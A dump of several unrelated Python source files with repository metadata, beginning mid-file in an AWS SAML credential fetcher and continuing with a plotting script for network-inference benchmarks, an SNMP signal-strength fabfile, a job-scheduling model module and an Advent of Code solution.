                     'Accept': 'application/json'},
            data=json.dumps({'username': username,
                             'password': password})
        )
        parsed = json.loads(response.text)
        if 'sessionToken' not in parsed:
            # Okta answers failed logins with a JSON error document instead
            # of a sessionToken; surface that as a SAMLError rather than a
            # confusing bare KeyError.
            raise SAMLError(self._ERROR_LOGIN_FAILED)
        session_token = parsed['sessionToken']
        saml_url = endpoint + '?sessionToken=%s' % session_token
        response = self._requests_session.get(saml_url)
        logger.info(
            'Received HTTP response of status code: %s', response.status_code)
        assertion = self._extract_saml_assertion_from_response(response.text)
        logger.info(
            'Received the following SAML assertion: \n%s', assertion,
            extra={'is_saml_assertion': True}
        )
        return assertion

    def is_suitable(self, config):
        """Handle profiles that request Okta form-based authentication."""
        return (
            config.get('saml_authentication_type') == 'form'
            and config.get('saml_provider') == 'okta'
        )
class ADFSFormsBasedAuthenticator(GenericFormsBasedAuthenticator):
    """Authenticator for Microsoft AD FS IdPs.

    Reuses the generic form-based flow; only the names of the username
    and password <input> fields differ from the generic defaults.
    """

    # Field names seen on AD FS login pages: the classic WebForms control
    # ids plus the newer plain "UserName"/"Password" names.
    USERNAME_FIELDS = (
        'ctl00$ContentPlaceHolder1$UsernameTextBox',
        'UserName',
    )

    PASSWORD_FIELDS = (
        'ctl00$ContentPlaceHolder1$PasswordTextBox',
        'Password',
    )

    def is_suitable(self, config):
        # Only handle profiles explicitly configured for ADFS form auth.
        return (
            config.get('saml_authentication_type') == 'form'
            and config.get('saml_provider') == 'adfs'
        )
class FormParser(six.moves.html_parser.HTMLParser):
    """HTML parser that collects <form> elements and their <input> fields."""

    def __init__(self):
        """Parse an html saml login form."""
        six.moves.html_parser.HTMLParser.__init__(self)
        self.forms = []
        self._current_form = None

    def handle_starttag(self, tag, attrs):
        # Track which form we are currently inside; inputs seen while
        # inside it are recorded under the synthetic '_fields' key.
        if tag == 'form':
            self._current_form = dict(attrs)
        elif tag == 'input' and self._current_form is not None:
            fields = self._current_form.setdefault('_fields', [])
            fields.append(dict(attrs))

    def handle_endtag(self, tag):
        if tag != 'form' or self._current_form is None:
            return
        self.forms.append(self._current_form)
        self._current_form = None

    def _dict2str(self, d):
        # HTMLParser unescapes entities such as "&" while feeding, so
        # re-escape values here to keep the reconstructed markup valid
        # input for ElementTree.
        attributes = []
        for key, value in d.items():
            escaped = escape(value)  # pylint: disable=deprecated-method
            attributes.append('%s="%s"' % (key, escaped))
        return ' '.join(sorted(attributes))

    def extract_form(self, index):
        """Render form *index* back into an HTML string.

        Raises IndexError when *index* is out of bounds.
        """
        form_attrs = dict(self.forms[index])
        inputs = form_attrs.pop('_fields', [])
        rendered_inputs = ''.join(
            '<input %s/>' % self._dict2str(field) for field in inputs)
        return '<form %s>%s</form>' % (self._dict2str(form_attrs),
                                       rendered_inputs)

    def error(self, message):
        # ParserBase, the parent of HTMLParser, declares this abstract
        # instead of just raising, so we must provide an implementation.
        raise FormParserError(message)
class SAMLCredentialFetcher(CachedCredentialFetcher):
    """Fetch (and cache) AWS credentials via SAML federation.

    Logs in at the configured IdP through one of the registered
    form-based authenticators, then exchanges the SAML assertion for
    temporary credentials with STS.AssumeRoleWithSAML.
    """

    # Registry of supported provider names -> authenticator classes.
    SAML_FORM_AUTHENTICATORS = {
        'okta': OktaAuthenticator,
        'adfs': ADFSFormsBasedAuthenticator
    }

    def __init__(self, client_creator, provider_name, saml_config,
                 role_selector=_role_selector,
                 password_prompter=getpass.getpass, cache=None,
                 expiry_window_seconds=60 * 15):
        """Credential fetcher for SAML.

        :param client_creator: Callable creating a botocore client,
            used here to build the (unsigned) STS client.
        :param provider_name: Key into SAML_FORM_AUTHENTICATORS.
        :param saml_config: Profile configuration dict for the provider.
        :param role_selector: Callable choosing one role from the roles
            offered in the assertion.
        :param password_prompter: Callable that prompts for a password.
        :param cache: Mapping used to cache credentials between calls.
        :param expiry_window_seconds: How long before actual expiry the
            cached credentials are considered stale.
        """
        self._client_creator = client_creator
        self._role_selector = role_selector
        self._config = saml_config
        self._provider_name = provider_name
        authenticator_cls = self.SAML_FORM_AUTHENTICATORS.get(provider_name)
        if authenticator_cls is None:
            raise ValueError('Unsupported SAML provider: %s' % provider_name)
        self._authenticator = authenticator_cls(password_prompter)
        # Lazily built by _get_assume_role_kwargs(); holds the SAML
        # assertion plus role/principal ARNs for AssumeRoleWithSAML.
        self._assume_role_kwargs = None

        if cache is None:
            cache = {}
        self._cache = cache
        self._stored_cache_key = None
        self._expiry_window_seconds = expiry_window_seconds

    @property
    def _cache_key(self):
        # Computed once and memoized; derived from provider + config.
        if self._stored_cache_key is None:
            self._stored_cache_key = self._create_cache_key()
        return self._stored_cache_key

    def _create_cache_key(self):
        # Hash the provider name and config so distinct profiles get
        # distinct cache entries; sort_keys makes the hash deterministic.
        cache_key_kwargs = {
            'provider_name': self._provider_name,
            'saml_config': self._config.copy()
        }
        cache_key_kwargs = json.dumps(cache_key_kwargs, sort_keys=True)
        argument_hash = sha1(cache_key_kwargs.encode('utf-8')).hexdigest()
        return self._make_file_safe(argument_hash)

    def fetch_credentials(self):
        # Re-map the base class's lowercase keys to the CamelCase names
        # expected by the credential-process protocol.
        creds = super(SAMLCredentialFetcher, self).fetch_credentials()
        return {
            'AccessKeyId': creds['access_key'],
            'SecretAccessKey': creds['secret_key'],
            'SessionToken': creds['token'],
            'Expiration': creds['expiry_time']
        }

    def _get_credentials(self):
        """Call STS.AssumeRoleWithSAML and return the raw response."""
        kwargs = self._get_assume_role_kwargs()
        client = self._create_client()
        logger.info(
            'Retrieving credentials with STS.AssumeRoleWithSaml() using the '
            'following parameters: %s', kwargs
        )
        response = deepcopy(client.assume_role_with_saml(**kwargs))
        # Serialize the datetime so the response is JSON/cache friendly.
        expiration = response['Credentials']['Expiration'].isoformat()
        response['Credentials']['Expiration'] = expiration
        return response

    def _create_client(self):
        # AssumeRoleWithSAML is an unsigned call (the assertion is the
        # credential), hence signature_version=UNSIGNED.
        return self._client_creator(
            'sts', config=Config(
                signature_version=botocore.UNSIGNED,
                user_agent_extra=(
                    'awsprocesscreds-saml/%s' % awsprocesscreds.__version__
                )
            )
        )

    def _get_role_and_principal_arn(self, assertion):
        # Let the role selector pick among the roles the IdP offered;
        # failing that, report every role that was available.
        idp_roles = self._parse_roles(assertion)
        role_arn = self._role_selector(self._config.get('role_arn'), idp_roles)
        if not role_arn:
            role_arns = [r['RoleArn'] for r in idp_roles]
            raise SAMLError('Unable to choose role "%s" from %s' % (
                self._config.get('role_arn'), role_arns
            ))
        return role_arn

    def _get_assume_role_kwargs(self):
        """Build (once) the kwargs for STS.AssumeRoleWithSAML."""
        if self._assume_role_kwargs is not None:
            return self._assume_role_kwargs

        config = self._config.copy()
        config['saml_provider'] = self._provider_name
        if not self._authenticator.is_suitable(config):
            raise ValueError('Invalid config')
        assertion = self._authenticator.retrieve_saml_assertion(config)
        if not assertion:
            raise SAMLError(
                'Failed to login at %s' % config['saml_endpoint'])
        arns = self._get_role_and_principal_arn(assertion)
        self._assume_role_kwargs = {
            'PrincipalArn': arns['PrincipalArn'],
            'RoleArn': arns['RoleArn'],
            'SAMLAssertion': assertion
        }
        return self._assume_role_kwargs

    def _parse_roles(self, assertion):
        """Extract the AWS Role attribute values from a SAML assertion.

        Returns a list of {'PrincipalArn': ..., 'RoleArn': ...} dicts.
        """
        attribute = '{urn:oasis:names:tc:SAML:2.0:assertion}Attribute'
        attr_value = '{urn:oasis:names:tc:SAML:2.0:assertion}AttributeValue'
        awsroles = []
        root = ET.fromstring(base64.b64decode(assertion).decode('ascii'))
        for attr in root.iter(attribute):
            if attr.get('Name') == \
                    'https://aws.amazon.com/SAML/Attributes/Role':
                for value in attr.iter(attr_value):
                    parts = [p.strip() for p in value.text.split(',')]
                    # Deals with "role_arn,pricipal_arn" or its reversed order
                    # (the principal ARN is the one containing 'saml-provider').
                    if 'saml-provider' in parts[0]:
                        role = {'PrincipalArn': parts[0], 'RoleArn': parts[1]}
                    else:
                        role = {'PrincipalArn': parts[1], 'RoleArn': parts[0]}
                    awsroles.append(role)
        return awsroles
| 37.748889
| 79
| 0.631836
|
4a05002fb928d0a7eaf5041205098776902f546d
| 8,903
|
py
|
Python
|
scripts/timeseries_sampling/plot_boxes_timeseries_scans_finest_sampling.py
|
jiawu/Roller
|
a70e350905a59c2254dcefda7ab23c6417cf8f7d
|
[
"MIT"
] | null | null | null |
scripts/timeseries_sampling/plot_boxes_timeseries_scans_finest_sampling.py
|
jiawu/Roller
|
a70e350905a59c2254dcefda7ab23c6417cf8f7d
|
[
"MIT"
] | 2
|
2015-07-13T18:51:22.000Z
|
2015-07-16T15:35:24.000Z
|
scripts/timeseries_sampling/plot_boxes_timeseries_scans_finest_sampling.py
|
jiawu/Roller
|
a70e350905a59c2254dcefda7ab23c6417cf8f7d
|
[
"MIT"
] | null | null | null |
import matplotlib
matplotlib.use('Agg')
from Swing.util.BoxPlot import BoxPlot
from matplotlib.backends.backend_pdf import PdfPages
from scipy import stats
import pdb
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import sys
import os
import time
from Swing.util.mplstyle import style1
import seaborn as sns
from palettable.colorbrewer.qualitative import Set1_3
def get_df(df, sampling_rate, network, min_lag, max_lag, td_window, inftype = "RandomForest"):
    """Return the rows of *df* matching one exact parameter combination.

    Filters on network, sampling rate, lag window, window size (compared
    as float) and inference method.
    """
    mask = (
        (df['network_number'] == network)
        & (df['sampling_rate'] == sampling_rate)
        & (df['min_lag'] == min_lag)
        & (df['max_lag'] == max_lag)
        & (df['td_window'] == float(td_window))
        & (df['InfType'] == inftype)
    )
    return df[mask]
def load_data():
    """Load the high-sampling scan results for all three inference methods.

    NOTE(review): reads from fixed absolute cluster paths -- confirm the
    paths still exist before reusing this script.
    """
    sources = [
        ("/projects/p20519/roller_output/high_sampling/RandomForest/",
         "RandomForest"),
        ("/projects/p20519/roller_output/high_sampling/Dionesus/", "PLSR"),
        ("/projects/p20519/roller_output/high_sampling/Lasso/", "Lasso"),
    ]
    frames = []
    for folder, label in sources:
        frame = read_tdr_results([folder], folder_str="2017-09")
        # Tag each frame with the inference method it came from.
        frame['InfType'] = label
        frames.append(frame)
    return pd.concat(frames)
def read_tdr_results(folder_list, folder_str):
    """Aggregate tab-separated result files into a single DataFrame.

    Scans each folder in *folder_list* for file names containing
    *folder_str*, reads them as TSVs, repairs files whose header row is
    shifted by one column, and concatenates everything.

    :param folder_list: Folders to scan.  Each entry must end with a
        path separator because file paths are built by concatenation.
    :param folder_str: Substring a file name must contain to be read.
    :return: One DataFrame with all rows (empty if nothing matched).
    """
    frames = []
    for input_folder in folder_list:
        for file_path in os.listdir(input_folder):
            if folder_str not in file_path:
                continue
            try:
                df = pd.read_csv(input_folder + file_path, sep='\t',
                                 engine='python')
            except pd.errors.EmptyDataError:
                # Zero-byte result files come from failed runs; skip them.
                # (pd.errors is the public home of this exception; the old
                # pd.io.common path was private and has been removed.)
                continue
            # Some files were written with the header shifted one column to
            # the right; detect that by a string landing in the numeric
            # 'permutation_n' column and realign columns.
            if type(df['permutation_n'].iloc[0]) is str:
                new_col = df.columns.tolist()
                new_col.pop(0)
                new_df = df.iloc[:, 0:len(df.iloc[0]) - 1]
                new_df.columns = new_col
                df = new_df
            frames.append(df)
    # DataFrame.append was removed in pandas 2.0 and was quadratic in a
    # loop anyway; collect frames and concatenate once.
    if not frames:
        return pd.DataFrame()
    return pd.concat(frames)
def get_inf_df(network_1, inf_type):
    """Per-sampling-rate column means for one inference method.

    NOTE(review): relies on groupby().mean() dropping the non-numeric
    'InfType' column as a nuisance column -- that behavior changed in
    pandas 2.x; confirm the pinned pandas version before rerunning.
    """
    method_rows = network_1[network_1['InfType'] == inf_type]
    return method_rows.groupby('sampling_rate').mean()
def get_comparisons(merged_df, inftypes, sampling_rates, network_list):
    """Compute % AUPR/AUROC change of lagged windows vs. full-window baseline.

    For every (method, sampling rate, network) combination, compares the
    chosen sliding-window runs against the full-size-window baseline and
    records the percent difference per trial.  Returns
    (overall_df, network_1_df) where the second frame holds only the
    single highlighted network.

    NOTE(review): sampling_rates and network_list are accepted but never
    used -- filtering is derived from merged_df itself; confirm intent.
    """
    # sampling rate -> (full window size, chosen td_window):
    # 10 - 101, 67
    # 30 - 34, 22
    # 50 - 21, 14
    # 100 - 11, 7
    # 200 - 6, 4
    # 333 - 4, 3
    # 500 - 3, 2
    max_window_dict = { '10':101,
                        '30':34,
                        '50':21,
                        '100':11,
                        '200':6,
                        '333':4,
                        '500':3}
    td_window_dict = { '10':67,
                        '30':22,
                        '50':14,
                        '100':7,
                        '200':4,
                        '333':2,
                        '500':2}
    all_networks = merged_df['network_number'].dropna().unique()
    all_sampling_rates = merged_df['sampling_rate'].dropna().unique()
    overall_df = pd.DataFrame()
    network_1_df = pd.DataFrame()
    for inftype in inftypes:
        for sampling_rate in all_sampling_rates:
            for network in all_networks:
                # Baseline: full-size window with no lag (min_lag=max_lag=0).
                baseline = get_df(merged_df, sampling_rate, network, 0, 0, max_window_dict[sampling_rate], inftype = inftype)
                if len(baseline) == 0:
                    continue
                td_window = td_window_dict[sampling_rate]
                min_lag = 1
                max_lag = 3
                max_window = max_window_dict[sampling_rate]
                # Clamp the lag range when the window nearly fills the series.
                if max_window - td_window < 3:
                    max_lag = max_window - td_window
                if min_lag > max_lag:
                    min_lag = max_lag
                comparisons = get_df(merged_df, sampling_rate, network, min_lag, max_lag, td_window, inftype = inftype)
                if len(comparisons) == 0:
                    continue
                # for each statistic, get the percent difference to the baseline comparison.
                stat = 'aupr'
                baseline_mean=baseline[stat].mean()
                comparisons['percent_{}'.format(stat)] = ((comparisons[stat]-baseline_mean)/baseline_mean)*100
                stat = 'auroc'
                baseline_mean=baseline[stat].mean()
                comparisons['percent_{}'.format(stat)] = ((comparisons[stat]-baseline_mean)/baseline_mean)*100
                # Cap at 100 trials per combination.
                overall_df = overall_df.append(comparisons.iloc[0:100,:], ignore_index = True)
                # NOTE(review): all_networks[6] singles out one network for the
                # per-network overlay plot -- presumably a hand-picked example;
                # confirm the index is still valid for the current data.
                if network == all_networks[6]:
                    network_1_df = network_1_df.append(comparisons.iloc[0:100,:], ignore_index = True)
                print(sampling_rate, network, len(baseline),len(comparisons), inftype)
    return(overall_df, network_1_df)
# ---- Script body: build comparison frames and draw the box plots. ----
test_statistic = ['aupr', 'auroc']
save_tag = "window_scan"
n_trials = 100
# NOTE(review): the loading/derivation lines below are commented out, so
# `merged_df` and `network_list` are undefined and the get_comparisons()
# call further down raises NameError unless these are re-enabled (or the
# pickle-loading variants are used instead).
#merged_df = load_data()
#merged_df.to_pickle("merged_sampling_scan.pkl")
#merged_df = pd.read_pickle("merged_sampling_scan.pkl")
#network_list = merged_df['file_path'].unique().tolist()
#network_list = [x for x in network_list if 'even' not in str(x)]
#merged_df['network_number'] = merged_df['file_path'].str.extract('((Ecoli|Yeast)-[0-9]{1,2})_[\d]+_timeseries')[0]
#merged_df['sampling_rate'] = merged_df['file_path'].str.extract('-[0-9]{1,2}_(\d+)_timeseries')
# baseline is the full size window. The full size windows are:
#
# parse the dataframe:
# sampling period
# base_network
# filter data
window_sizes = range(2,22)
inftypes = ['RandomForest', 'Lasso', 'PLSR']
sampling_rates = [10]
overall_df, network_1 = get_comparisons(merged_df, inftypes, sampling_rates, network_list)
overall_df.to_pickle("merged_sampling_comparisons_finest.pkl")
network_1.to_pickle("merged_sampling_comparisons_network1_finest.pkl")
#overall_df = pd.read_pickle("merged_sampling_comparisons_finest.pkl")
#network_1 = pd.read_pickle("merged_sampling_comparisons_network1_finest.pkl")
stat = 'percent_aupr'
# NOTE(review): interactive debugger breakpoint left in -- the script
# stops here when run non-interactively; remove for batch use.
pdb.set_trace()
# --- AUPR: one box plot per inference method, % change vs. baseline. ---
meanpointprops = dict(marker = 'o', markeredgecolor='black', markerfacecolor='white', markeredgewidth = 1, markersize = 10)
medianprops = dict(color='black', linewidth=1.5)
g = sns.FacetGrid(overall_df, col = "InfType", size = 12, aspect=0.6)
g = g.map(sns.boxplot, 'sampling_rate', 'percent_aupr', showfliers = False, order = ['10','30','50','100','200','333','500'],color = 'cornflowerblue', showmeans=True, meanprops = meanpointprops, medianprops=medianprops)
g.set(ylim=(-60, 200))
g.set(xlabel="Sampling Rate")
g.fig.get_axes()[0].set_ylabel("% change AUPR")
# Zero line = no change relative to the full-window baseline.
g.fig.get_axes()[0].axhline(y = 0, c = "darkgrey")
g.fig.get_axes()[1].axhline(y = 0, c = "darkgrey")
g.fig.get_axes()[2].axhline(y = 0, c = "darkgrey")
## Plot the AUPR for 1 graph, dionesus
index = ['10', '30', '50', '100', '200','333', '500']
RFn1 = get_inf_df(network_1, inf_type = 'RandomForest')
net1color = 'firebrick'
g.fig.get_axes()[0].plot(RFn1.loc[index, stat], marker='.', color = net1color)
Ln1 = get_inf_df(network_1, inf_type = 'Lasso')
g.fig.get_axes()[1].plot(Ln1.loc[index, stat], marker='.', color = net1color)
Pn1 = get_inf_df(network_1, inf_type = 'PLSR')
g.fig.get_axes()[2].plot(Pn1.loc[index,stat], marker='.', color = net1color)
#for axes in g.axes.flat:
#    axes.set_xticklabels(['{:d}'.format(x) for x in axes.get_xticks()])
g.savefig('combined_10_AUPR_sampling_heat_map.pdf')
# NOTE(review): second debugger breakpoint left in.
pdb.set_trace()
## Plot AUROC
# --- AUROC: same layout as the AUPR figure above. ---
stat = 'percent_auroc'
meanpointprops = dict(marker = 'o', markeredgecolor='black', markerfacecolor='white', markeredgewidth = 1, markersize = 10)
medianprops = dict(color='black', linewidth=1.5)
g = sns.FacetGrid(overall_df, col = "InfType", size = 12, aspect=0.6)
g = g.map(sns.boxplot, 'sampling_rate', 'percent_auroc', order=['10','30','50','100','200','333','500'], showfliers = False, color = 'darkorange', showmeans=True, meanprops = meanpointprops, medianprops=medianprops)
g.set(ylim=(-50, 60))
g.set(xlabel="Sampling Rate")
g.fig.get_axes()[0].set_ylabel("% change AUROC")
g.fig.get_axes()[0].axhline(y = 0, c = "darkgrey")
g.fig.get_axes()[1].axhline(y = 0, c = "darkgrey")
g.fig.get_axes()[2].axhline(y = 0, c = "darkgrey")
## Plot the AUROC for 1 graph, all inf methods
RFn1 = get_inf_df(network_1, inf_type = 'RandomForest')
net1color = 'firebrick'
g.fig.get_axes()[0].plot(RFn1[stat].values, marker='.', color = net1color)
Ln1 = get_inf_df(network_1, inf_type = 'Lasso')
g.fig.get_axes()[1].plot(Ln1[stat].values, marker='.', color = net1color)
Pn1 = get_inf_df(network_1, inf_type = 'PLSR')
g.fig.get_axes()[2].plot(Pn1[stat].values, marker='.', color = net1color)
#for axes in g.axes.flat:
#    axes.set_xticklabels(['{:d}'.format(x) for x in axes.get_xticks()])
g.savefig('combined_10_AUROC_sampling_heatmap.pdf')
| 40.652968
| 219
| 0.640009
|
4a05008e9e7e6f446ddc73250f9ef3c9566eb1f6
| 2,199
|
py
|
Python
|
snmp_fabfile.py
|
edwinsteele/python-scripts
|
b2ed85df202f5e58ed178b00100357bde1002010
|
[
"CC0-1.0"
] | 2
|
2015-10-05T04:20:52.000Z
|
2016-04-08T10:31:21.000Z
|
snmp_fabfile.py
|
edwinsteele/python-scripts
|
b2ed85df202f5e58ed178b00100357bde1002010
|
[
"CC0-1.0"
] | null | null | null |
snmp_fabfile.py
|
edwinsteele/python-scripts
|
b2ed85df202f5e58ed178b00100357bde1002010
|
[
"CC0-1.0"
] | null | null | null |
import os
from fabric.api import env, local, parallel, task
from fabric.context_managers import cd, hide, quiet, warn_only
import fabric.colors
from hnmp import SNMP, SNMPError
import time
ACCESS_POINTS = ["ap-kitchen", "ap-bedroom"]
def retry_until_true(delay_secs=1):
    """Decorator factory: re-call the wrapped function until it is truthy.

    The wrapped function's first positional argument is expected to be a
    colour-printing callable, used to announce each retry.
    Mostly pinched from https://wiki.python.org/moin/PythonDecoratorLibrary
    """
    def decorator(func):
        def wrapper(*args, **kwargs):
            result = func(*args, **kwargs)
            while not result:
                # args[0] is the colour function supplied by the caller.
                print(args[0]("retrying"))
                time.sleep(delay_secs)
                result = func(*args, **kwargs)
            return result
        return wrapper
    return decorator
def do_stuff():
    """Placeholder per-host action; just reports which host it ran for."""
    # The rest of this file uses parenthesized print(...) calls that parse
    # under both Python 2 and 3; the bare print statement here was the one
    # Python-2-only construct, so make it consistent (and py3-parsable).
    print("do_stuff for %s" % (env.host_string,))
@retry_until_true(delay_secs=5)
def get_mac(c):
    """Look up the MAC address of env.host_string from the ARP cache.

    Returns None (triggering a retry) while the cache entry is missing
    or incomplete; *c* is the colour function used for retry messages.
    """
    with quiet():
        # Ping first to give the ARP cache a chance to be populated.
        ping()
        result = local("arp %s" % (env.host_string,), capture=True)
        if ("incomplete" in result.stdout
                or "no entry" in result.stdout
                or "Unknown host" in result.stderr):
            return None
        # arp output: "host (addr) at <mac> on <iface> ..." -> 4th field.
        return result.stdout.split(" ")[3]
def ping():
    """Send a single quiet ping (2s timeout) to the current host."""
    cmd = "ping -q -t 2 -c 1 %s" % (env.host_string,)
    local(cmd)
def get_print_colour():
    """Pick a stable colour for this host from its position in env.hosts."""
    palette = ("blue", "green", "magenta", "red", "yellow", "cyan")
    colour_name = palette[env.hosts.index(env.host_string)]
    return getattr(fabric.colors, colour_name)
def mac_to_snmp_string(mac_addr):
    """Encode a MAC address string as dotted decimal ASCII codepoints.

    Each character is uppercased and replaced by its ordinal value -- the
    encoding SNMP uses for string-typed table indices.
    """
    codepoints = []
    for char in mac_addr:
        codepoints.append(str(ord(char.upper())))
    return ".".join(codepoints)
def get_signal_strength(ap, mac_addr):
    """Query access point *ap* over SNMP for one client's signal strength.

    Returns the strength in dB, or None when the SNMP query fails (e.g.
    the client is not associated with that access point).
    """
    # Wireless-client table OID, indexed by the encoded MAC string.
    # (1.3.6.1.4.1.63 is an Apple enterprise OID -- presumably AirPort
    # base stations; confirm against the target hardware.)
    BASE_OID = "1.3.6.1.4.1.63.501.3.2.2.1.6.17."
    try:
        snmp_session = SNMP(ap)
        strength = snmp_session.get(BASE_OID + mac_to_snmp_string(mac_addr))
    except SNMPError:
        strength = None
    return strength
@task
def meta():
    """Continuously report this host's signal strength at every AP."""
    colour = get_print_colour()
    # get_mac retries until the ARP cache yields an entry for the host.
    mac = get_mac(colour)
    print(colour("MAC (%s) is %s" % (env.host_string, mac,)))
    # Poll forever; intended to be stopped with Ctrl-C.
    while True:
        for access_point in ACCESS_POINTS:
            print(colour("%s signal strength: %s db" %
                         (access_point,
                          get_signal_strength(access_point, mac))))
        time.sleep(5)
| 26.493976
| 81
| 0.607094
|
4a05010a7cfe77def2bee2b85c7f513d7675891c
| 3,877
|
py
|
Python
|
raphael/app/modules/schedule/models.py
|
major1201/raphael
|
18d7060834be7645b66144ba2a1638f3e1db2dd2
|
[
"MIT"
] | null | null | null |
raphael/app/modules/schedule/models.py
|
major1201/raphael
|
18d7060834be7645b66144ba2a1638f3e1db2dd2
|
[
"MIT"
] | null | null | null |
raphael/app/modules/schedule/models.py
|
major1201/raphael
|
18d7060834be7645b66144ba2a1638f3e1db2dd2
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
from __future__ import division, absolute_import, with_statement, print_function
import json
from apscheduler.jobstores.base import JobLookupError
from raphael.utils.dao.context import DBContext
from raphael.utils import num, strings, time, task, logger
TASK_DATABASE = 'database'
def get_schedule(oid):
    """Fetch a single cm_schedule row by its primary key."""
    return DBContext().get('cm_schedule', oid)
def save_task_schedule(o):
    """Register (or remove) the scheduler job for a schedule row.

    Depending on ``o['type']`` the job is added as a one-shot date job
    (1), an interval job (2) or a cron job (3); when ``o['enabled']`` is
    falsy the job is removed instead.

    :raises ValueError: If the object carries no ``id``.
    """
    if strings.is_blank(o.get('id', None)):
        raise ValueError('Field "id" not in this object: ' + str(o))
    if o['enabled']:
        # prepare args & kwargs -- stored as a JSON blob; parsing stays
        # best-effort because legacy rows may hold malformed/empty data.
        args = None
        kwargs = None
        try:
            args_kwargs = json.loads(o['args'])
            args = args_kwargs['args']
            kwargs = args_kwargs['kwargs']
        except (TypeError, ValueError, KeyError):
            # Narrowed from a bare `except:` (which also swallowed
            # SystemExit/KeyboardInterrupt) to the failures JSON parsing
            # and key access can actually produce.
            pass
        # add
        if o['type'] == 1:  # date
            task.add_date_job(o['func'], o['id'], TASK_DATABASE, args=args, kwargs=kwargs, run_date=time.string_to_date(o['data'], '%Y-%m-%d %H:%M:%S'), timezone='utc')
        elif o['type'] == 2:  # interval
            interval = json.loads(o['data'])
            task.add_interval_job(o['func'], o['id'], TASK_DATABASE, args=args, kwargs=kwargs, weeks=num.safe_int(interval['weeks']), days=num.safe_int(interval['days']),
                                  hours=num.safe_int(interval['hours']), minutes=num.safe_int(interval['minutes']), seconds=num.safe_int(interval['seconds']),
                                  start_date=o['starttime'], end_date=o['endtime'], timezone='utc')
        elif o['type'] == 3:  # cron
            cron = json.loads(o['data'])
            task.add_cron_job(o['func'], o['id'], TASK_DATABASE, args=args, kwargs=kwargs, year=cron['year'], month=cron['month'], day=cron['day'],
                              day_of_week=cron['day_of_week'], hour=cron['hour'], minute=cron['minute'], second=cron['second'],
                              start_date=o['starttime'], end_date=o['endtime'], timezone='utc')
    else:
        # Disabled schedule: make sure no job remains registered.
        try:
            task.remove_job(o['id'], TASK_DATABASE)
        except JobLookupError:
            pass
def save_schedule(o):
    """Persist a schedule row (insert or update)."""
    with DBContext() as db_ctx:
        db_ctx.save('cm_schedule', o)
def save_schedule_manually(o):
    """Persist a schedule row and (re)register its scheduler job."""
    # NOTE(review): the outer DBContext is entered but never referenced --
    # presumably it scopes a transaction around both calls; confirm.
    with DBContext():
        save_schedule(o)
        save_task_schedule(o)
def delete_schedule(oid):
    """Delete a schedule row, its log entries and its scheduler job."""
    with DBContext() as db_ctx:
        db_ctx.delete_byid('cm_schedule', oid)
        db_ctx.execute_delete('cm_schedule_log', 'scheduleid = :sid', sid=oid)
        try:
            task.remove_job(oid, TASK_DATABASE)
        except JobLookupError:
            # The job may already be gone (e.g. a disabled schedule);
            # log the traceback but still treat the deletion as done.
            logger.error_traceback()
def find_schedules(**params):
    """Build a filtered query over cm_schedule.

    Supported filters: ``enabled``, ``type``, ``module`` (exact match),
    ``modulelike`` (substring), ``sourceid``.  Unknown keys are ignored.
    """
    clauses = ['1=1']
    bindings = {}
    if 'enabled' in params:
        clauses.append('and enabled = :enabled')
        bindings['enabled'] = params['enabled']
    if 'type' in params:
        clauses.append('and type = :type')
        bindings['type'] = params['type']
    if 'module' in params:
        clauses.append('and module = :module')
        bindings['module'] = params['module']
    if 'modulelike' in params:
        clauses.append('and module like :modulelike')
        bindings['modulelike'] = '%' + params['modulelike'] + '%'
    if 'sourceid' in params:
        clauses.append('and sourceid = :sourceid')
        bindings['sourceid'] = params['sourceid']
    return DBContext().create_query('cm_schedule', ' '.join(clauses),
                                    **bindings)
# schedule_log
def save_schedule_log(o):
    """Persist one schedule-execution log entry."""
    DBContext().save('cm_schedule_log', o)
def find_schedule_logs(**params):
    """Build a filtered query over cm_schedule_log.

    Supported filters: ``scheduleid`` and ``status`` (coerced to int).
    """
    clauses = ['1=1']
    bindings = {}
    if 'scheduleid' in params:
        clauses.append('and scheduleid = :scheduleid')
        bindings['scheduleid'] = params['scheduleid']
    if 'status' in params:
        clauses.append('and status = :status')
        bindings['status'] = num.safe_int(params['status'])
    return DBContext().create_query('cm_schedule_log', ' '.join(clauses),
                                    **bindings)
| 35.245455
| 170
| 0.593242
|
4a0502d78ce2411de6a34f48157e656757a53ccf
| 1,232
|
py
|
Python
|
day-04/part-2/ludoge.py
|
badouralix/adventofcode-2018
|
543ce39d4eeb7d9d695459ffadca001a8c56386d
|
[
"MIT"
] | 31
|
2018-12-01T00:43:40.000Z
|
2020-05-30T05:18:59.000Z
|
day-04/part-2/ludoge.py
|
badouralix/adventofcode-2018
|
543ce39d4eeb7d9d695459ffadca001a8c56386d
|
[
"MIT"
] | 14
|
2018-12-01T12:14:26.000Z
|
2021-05-07T22:41:47.000Z
|
day-04/part-2/ludoge.py
|
badouralix/adventofcode-2018
|
543ce39d4eeb7d9d695459ffadca001a8c56386d
|
[
"MIT"
] | 10
|
2018-12-01T23:38:34.000Z
|
2020-12-28T13:36:10.000Z
|
from tool.runners.python import SubmissionPy
from collections import Counter
class LudogeSubmission(SubmissionPy):
    """AoC 2018 day 4 part 2: guard most frequently asleep on one minute."""

    def run(self, s):
        # :param s: input in string format
        # :return: solution flag
        # Your code goes here
        # Records sort chronologically because each line begins with a
        # [YYYY-MM-DD HH:MM] timestamp.
        lines = sorted(s.splitlines())
        guards = {}  # guard id -> list of minutes spent asleep
        for line in lines:
            minute = int(line.split()[1][3:5])
            if "#" in line:
                # "Guard #N begins shift" -- switch the active guard.
                guard_id = int(line.split()[3][1:])
                if guard_id not in guards:
                    guards[guard_id] = []
                # NOTE(review): this assignment looks like a leftover --
                # wakes_up is always re-set by the "wakes up" branch below
                # before it is read.
                wakes_up = minute
            if "falls asleep" in line:
                falls_asleep = minute
            if "wakes up" in line:
                wakes_up = minute
                # Asleep from falls_asleep (inclusive) to wakes_up (exclusive).
                guards[guard_id] += list(range(falls_asleep, wakes_up))
        # Per-guard frequency of each asleep minute; guards who never slept
        # are dropped by the truthiness filter.
        guard_minute_frequency = {k: dict(Counter(v)) for k, v in guards.items() if Counter(v)}
        # Highest single-minute sleep count per guard...
        guard_minute_max = {k: max(v.values()) for k, v in guard_minute_frequency.items()}
        # ...and the guard achieving the overall maximum.
        max_guard = max(guard_minute_frequency, key=guard_minute_max.get)
        max_guard_sleeps = guards[max_guard]
        max_minute = max(set(max_guard_sleeps), key=max_guard_sleeps.count)
        return max_minute * max_guard
        # NOTE(review): unreachable statement after return.
        pass
| 35.2
